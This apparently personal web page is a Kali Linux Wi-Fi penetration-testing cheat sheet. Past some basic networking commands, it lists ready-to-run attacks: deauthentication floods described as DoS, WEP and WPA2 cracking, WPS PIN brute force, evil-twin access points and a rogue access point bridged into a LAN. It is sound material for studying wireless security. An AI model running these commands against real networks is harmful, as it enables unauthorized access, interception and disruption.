Progmar Marcin Załęczny

Language:

Wi-fi penetration testing in Kali Linux

Displays all tcp connections (-t option) with resolving hosts' names turned off (-n option): netstat -nt

Displays all ports list which the computer is listening on (only tcp connections and no hosts' names resolving): netstat -ntl

Turns on packets forwarding between various networks (turns on router functionality): sysctl -w net.ipv4.ip_forward

Scanning for wi-fi networks accessible for wlan0 interface: iw dev wlan0 scan

Displays information about wi-fi network which the wlan0 inteface is connected to: iw dev wlan0 link

Connects to specified unprotected wi-fi network: iw wlan0 connect network_name

Displays wireless network interfaces list: iwconfig

Activates wlan0 network interface: ifconfig wlan0 up

Displays status of wlan0 network interface: ifconfig wlan0

Displays detailed information on access points found: iwlist wlan0 scanning

Connects to unprotected wifi network: iwconfig wlan0 essid "my network"

Connects to WEP-protected wifi network: iwconfig wlan0 essid "my network" key haslo_WEP_do_sieci

To connect to WPA-protected wifi network, you have to use WPA_supplicant and its configuration files:

  1. Create ~/wpa_network.conf file with following content:
    network={
        ssid="my network"
        key_mgmt=WPA-PSK
        proto=WPA
        pairwise=TKIP
        group=TKIP
        psk="password_to_WPA_protected_wifi"
    }
  2. Next issue following command:
    wpa_supplicant -D wext -i wlan0 -c wpa_network.conf

After connecting to a wifi network you can use command below to obtain an IP address in the network: dhcpclient3 wlan0

Displays routing table without resolving host names: route -n

Lists all wifi adapters that can work in the monitor mode: airmon-ng

Switches chosen wifi adapter to work in monitor mode: airmon-ng start wlan0 If the program displays an information that the switching was impossible because of some processes running (the processes will be listed together with theirs PID-s), then execute command: airmon-ng check kill The command will kill them. Next try once again to switch wifi adapter to work in monitor mode. This time the attempt should be successful, you can confirm that by the command airmon-ng It will show information about the new monitor interface created: wlan0mon

Switches off monitor mode on the interface: airmon-ng stop wlan0mon

To be able to intercept packets in the Wireshark application you should run it as the root. Next click the menu Capture -> Interfaces... and in the dialog box shown select interface you want to monitor and click Start button.

To make Wireshark to show only management frames you should fill a Filter entry with condition as below: wlan.fc.type == 0 and press Apply button.

To make Wireshark to show only control frames you should fill a Filter entry with condition as below: wlan.fc.type == 1

To make Wireshark to show only data frames you should fill a Filter entry with condition as below: wlan.fc.type == 2

To display only frames of specified type and subtype - for example control frames of Beacon subtype - you should enter condition: (wlan.fc.type == 0) && (wlan.fc.subtype == 8) Frames Probe Request: (wlan.fc.type == 0) && (wlan.fc.subtype == 4) Frames Probe Response: (wlan.fc.type == 0) && (wlan.fc.subtype == 5) Frames Deauthentication: (wlan.fc.type == 0) && (wlan.fc.subtype == 0x0c) Frames Reassociation Request: (wlan.fc.type == 0) && (wlan.fc.subtype == 2) Frames Reassociation Response: (wlan.fc.type == 0) && (wlan.fc.subtype == 3) If you want to reveal hidden wifi networks you should monitor Probe Request/Probe Respons frames. They are sent just before making a connection and they contain hidden SSID in plain text.

Displays frames that are sent/received by an interface of specified mac address: wlan.addr == cc:cc:cc:cc:cc:cc

Displays all frames but the Beacon ones that are sent/received by an interface of specified mac address: (wlan.addr==00:14:bf:8f:b1:f5) && !(wlan.fc.type_subtype==0x08)

To make a filter basing on appropriate selection in the frame details in the Wireshark, you should right-click chosen field and from the context menu select option: Apply as Filter -> Selected. This causes the Filter entry to fill in with proper condition.

Displays information (ex. signal strength, channel, cipherment) about access point of specified mac address: airodump-ng --bssid 70:62:b8:65:c8:58 wlan0mon

As in command above, but only 2-nd channel is monitored and there are listed only wifi clients connected to the specified access point: airodump-ng -c 2 -a --bssid 70:62:b8:65:c8:58 wlan0mon

Writes communication between specified access point and wifi clients in files of name beginning with "keystream" or "WEPCrack" word: airodump-ng wlan0mon -c 2 --bssid 70:62:b8:65:c8:58 -w keystream or airodump-ng wlan0mon --bssid 00:14:BF:B1:52:DE --channel 11 --write WEPCrack

Making the wifi interface to work on a specified (10) channel: iwconfig wlan0mon channel 10

Wireshark filter which displays only packets sent/received by a specified access point: wlan.bssid == 70:62:b8:65:c8:58

Wireshark filter which displays only data packets sent/received by a specified access point: (wlan.bssid == 70:62:b8:65:c8:58) && (wlan.fc.type_subtype == 0x20)

Wireshark filter which displays all packets sent/received by a specified access point but the broadcast ones (Beacon): (wlan.bssid == 70:62:b8:65:c8:58) && !(wlan.fc.type_subtype == 0x08)

Injects packets to specified access point (with the ESSID and mac address given): aireplay-ng -9 -e Linksys -a 70:62:b8:65:c8:58 wlan0mon

Sends in the name of specified access point (with given mac address) Deauthentication packets what will make wifi clients to disconnect and connect once again: aireplay-ng -0 5 -a 70:62:b8:65:c8:58 wlan0mon
aireplay-ng -0 5 -a 70:62:b8:65:c8:58 --ignore-negative-one wlan0mon

As above but Deauthentication packets are sent to the specified (-c option) wireless client. This is a demo of DoS attack: aireplay-ng -0 35 -a 00:14:BF:B1:52:DE -c 00:14:BF:8F:B1:F5 wlan1mon

Sends in the name of specified access point (with given mac address after -a option) Deauthentication packets until CONTROL+C is pressed. This is a DoS attack for all wifi clients that try to connect to the access point: aireplay-ng -0 0 -a 00:14:BF:B1:52:DE --ignore-negative-one wlan1mon

Uses - catched in the file keystream...xor file - stream of WEP key to authenticate at specified (after -a option) access point. The command uses a mac address specified after -h option as a mac address of the client: aireplay-ng -1 0 -e Linksys -y keystream-70:62:b8:65:c8:58.xor -a 70:62:b8:65:c8:58 -h cc:cc:cc:cc:cc:cc wlan0mon

Injects ARP packets (-3 option) in the name of specified wifi client (-h option) to a wireless network with the specified access point (-b option): aireplay-ng -3 -b 00:14:BF:B1:52:DE -h 00:14:BF:8F:B1:F5 wlan0mon

Cracking WEP key: aircrack-ng WEPCrack-01.cap

Changes default law stipulation settings for the wifi network card to the specified country (Poland, the United States): iw reg set PL
iw reg set US

Sets specified mac address for a wlan0 interface: macchanger -m <mac> wlan0

In Wireshark packets - from a *.cap file or cathed ones - that are responsible for the authentication have in a column Protocol value of EAPOL and in a column Info string like "Key (Message 1 of 4)".

Dictionary cracking of a WPA2 passwords: aircrack-ng linksys-01.cap -w file_with_passwords.txt Speeds up dictionary cracking by computing PMK keys for a given SSID (and only for it): genpmk -f dictionary_file.txt -d computed_PMK_keys.txt -s Linksys Uses computed PMK keys to guess password: cowpatty -d computed_PMK_keys.txt -s Linksys -r linksys-01.cap To be able to use generated by genpmk command file containing PMK keys in aircrack-ng program, you have to convert it to appropriate format: airolib-ng PMK_for_aircrack.txt --import cowpatty computed_PMK_keys.txt Next use command: aircrack-ng -r PMK_for_aircrack.txt linksys-01.cap

Deciphers catched WEP packets: airdecap-ng -w found_wep_key WEPCrack-01.cap

Deciphers catched WPA/WPA2 PSK packets: airdecap-ng -p password_found WPACrack-01.cap -e Linksys

Creates an evil twin access point - an AP that imitates an already existing AP (linksys_devel) which works on channel 11. Created in this way AP has ESSID equal to "default" periodically switching to "linksys_devel". To the AP will conect the nearest wifi clients: airbase-ng --essid linksys_devel -c 11 wlan1mon

As above but it creates more difficult to detect evil twin - the one which has also an identical mac address as the original AP. However from my tests results that it is more difficult to make wifi clients connects to the AP: airbase-ng -a 00:14:BF:B1:52:DE --essid linksys_devel -c 11 wlan1mon

Creates an access point without the cyphering: airbase-ng --essid linksys_devel -a 11:11:11:11:11:11 -c 11 wlan1mon

Creates a WEP protected access point: airbase-ng --essid linksys_devel -a 22:22:22:22:22:22 -c 11 -W 1 wlan1mon

Creates a WPA PSK protected access point: airbase-ng --essid linksys_devel -a 33:33:33:33:33:33 -c 11 -W 1 -z 2 wlan1mon

Creates a WPA2 PSK protected access point: airbase-ng --essid linksys_devel -a 44:44:44:44:44:44 -c 11 -W 1 -Z 2 wlan1mon

Detects access points that run WPS protocol: wash --ignore-fcs -i wlan0mon Cracking WPS PIN using brute-force method: reaver -i wlan0mon -b 11:22:33:44:55:66 -vv

Monitoring in the terminal packets of type "Probe request": tshark -n -i wlan0mon subtype probereq Monitoring in the terminal packets of type "Probe request", outputed data contain only mac address of the client and an SSID of an access point: tshark -n -i wlan0mon subtype probereq -T fields -e separator= -e wlan.sa -e wlan_mgt.ssid

How to configure a non-authorizated access point:

  1. Switch a wifi card to the monitor mode: airmon-ng start wlan0
  2. Create an access point: airbase-ng --essid Test -c 11 wlan0mon
  3. Make sure that you have installed bridge-utils: apt-get install bridge-utils
  4. Create a bridge: brctl addbr my-bridge
  5. Connect eth1 interface (LAN that you are connected to) with at0 interface (created in second point by creating access point) with the my-bridge bridge: brctl addif my-bridge at0
    brctl addif my-bridge eth1
  6. Activate both at0 and eth1 intefaces: ifconfig at0 0.0.0.0 up
    ifconfig eth1 0.0.0.0 up
  7. Configure IP address of the bridge: ifconfig my-bridge 192.168.0.180 up
  8. Enable packet forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
  9. Add default gateway: ip route del default
    ip route add default via 192.168.0.1

The process of cracking WEP key:

  1. In first terminal window issue command (described earlier): airodump-ng wlan0mon --bssid 00:14:BF:B1:52:DE --channel 11 --write WEPCrack
  2. In second terminal window issue command (described earlier): aireplay-ng -3 -b 00:14:BF:B1:52:DE -h 00:14:BF:8F:B1:F5 wlan0mon
  3. In third terminal window issue command (described earlier): aircrack-ng WEPCrack-01.cap